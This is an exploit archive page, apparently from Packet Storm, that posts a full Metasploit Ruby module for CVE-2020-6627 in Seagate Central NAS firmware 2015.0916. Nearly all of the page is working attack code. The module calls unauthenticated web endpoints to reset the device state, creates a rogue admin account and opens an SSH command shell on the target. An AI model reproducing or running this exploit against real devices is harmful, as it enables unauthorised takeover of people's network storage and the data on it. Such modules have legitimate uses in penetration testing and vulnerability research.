what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Seagate Central Storage 2015.0916 User Creation / Command Execution

Seagate Central Storage 2015.0916 User Creation / Command Execution
Posted May 26, 2023
Authored by Ege Balci | Site metasploit.com

This Metasploit module exploits the broken access control vulnerability in Seagate Central External NAS Storage device. Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to change the device state and register a new admin user which is capable of SSH access.

tags | exploit, vulnerability
advisories | CVE-2020-6627
SHA-256 | 0c0244a7cf8607e5471c8c892d6c5977f98fef410819f0a4cba83bca34b40d39

Seagate Central Storage 2015.0916 User Creation / Command Execution

Change Mirror Download
##
# Exploit Title: Seagate Central Storage 2015.0916 - Unauthenticated Remote Command Execution (Metasploit)
# Date: Dec 9 2019
# Exploit Author: Ege Balci
# Vendor Homepage: https://www.seagate.com/de/de/support/external-hard-drives/network-storage/seagate-central/
# Version: 2015.0916
# CVE : 2020-6627

# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/http'
require 'net/ssh'
require 'net/ssh/command_stream'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::SSH

def initialize(info={})
super(update_info(info,
'Name' => "Seagate Central External NAS Arbitrary User Creation",
'Description' => %q{
This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device.
Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to change the device state
and register a new admin user which is capable of SSH access.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Ege Balc─▒ <egebalci@pm.me>' # author & msf module
],
'References' =>
[
['URL', 'https://pentest.blog/advisory-seagate-central-storage-remote-code-execution/'],
['CVE', '2020-6627']
],
'DefaultOptions' =>
{
'SSL' => false,
'WfsDelay' => 5,
},
'Platform' => ['unix'],
'Arch' => [ARCH_CMD],
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find'
}
},
'Targets' =>
[
['Auto',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD
}
],
],
'Privileged' => true,
'DisclosureDate' => "Dec 9 2019",
'DefaultTarget' => 0
))


register_options(
[
OptString.new('USER', [ true, 'Seagate Central SSH user', '']),
OptString.new('PASS', [ true, 'Seagate Central SSH user password', ''])
], self.class
)

register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)

end

def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,"/index.php/Start/get_firmware"),
'headers' => {
'X-Requested-With' => 'XMLHttpRequest'
}
},60)

if res && res.body.include?('Cirrus NAS') && res.body.include?('2015.0916')
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end

def exploit

# First get current state
first_state=get_state()
if first_state
print_status("Current device state: #{first_state['state']}")
else
return
end

if first_state['state'] != 'start'
# Set new start state
first_state['state'] = 'start'
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php/Start/set_start_info'),
'ctype' => 'application/x-www-form-urlencoded',
'data' => "info=#{first_state.to_json}"
},60)

changed_state=get_state()
if changed_state && changed_state['state'] == 'start'
print_good("State successfully changed !")
else
print_error("Could not change device state")
return
end
end

name = Rex::Text.rand_name_male
user = datastore['USER'] || "#{Rex::Text.rand_name_male}{rand(1..9999).to_s}"
pass = datastore['PASS'] || Rex::Text.rand_text_alpha(8)

print_status('Creating new admin user...')
print_status("User: #{user}")
print_status("Pass: #{pass}")

# Add new admin user
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,"/index.php/Start/add_edit_user"),
'ctype' => 'application/x-www-form-urlencoded',
'headers' => {
'X-Requested-With' => 'XMLHttpRequest'
},
'vars_post' => {user: JSON.dump({user: user, fullname: name, pwd: pass, email: "#{name}@localhost", isAdmin: true, uid: -1}), action: 1}
},60)


conn = do_login(user,pass)
if conn
print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")
handler(conn.lsock)
end

end



def do_login(user, pass)
factory = ssh_socket_factory
opts = {
:auth_methods => ['password', 'keyboard-interactive'],
:port => 22,
:use_agent => false,
:config => false,
:password => pass,
:proxy => factory,
:non_interactive => true,
:verify_host_key => :never
}

opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']

begin
ssh = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh = Net::SSH.start(rhost, user, opts)
end
rescue Rex::ConnectionError
fail_with Failure::Unreachable, 'Connection failed'
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication"
rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return
end

if ssh
conn = Net::SSH::CommandStream.new(ssh)
ssh = nil
return conn
end

return nil
end

def get_state
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,"/index.php/Start/json_get_start_info"),
'headers' => {
'X-Requested-With' => 'XMLHttpRequest'
}
},60)

if res && (res.code == 200 ||res.code == 100)
return res.get_json_document
end
res = nil
end
end

Login or Register to add favorites

File Archive:

May 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    15 Files
  • 2
    May 2nd
    16 Files
  • 3
    May 3rd
    38 Files
  • 4
    May 4th
    15 Files
  • 5
    May 5th
    35 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    8 Files
  • 9
    May 9th
    65 Files
  • 10
    May 10th
    19 Files
  • 11
    May 11th
    27 Files
  • 12
    May 12th
    8 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    1 Files
  • 15
    May 15th
    19 Files
  • 16
    May 16th
    66 Files
  • 17
    May 17th
    28 Files
  • 18
    May 18th
    32 Files
  • 19
    May 19th
    13 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    23 Files
  • 23
    May 23rd
    15 Files
  • 24
    May 24th
    49 Files
  • 25
    May 25th
    20 Files
  • 26
    May 26th
    13 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close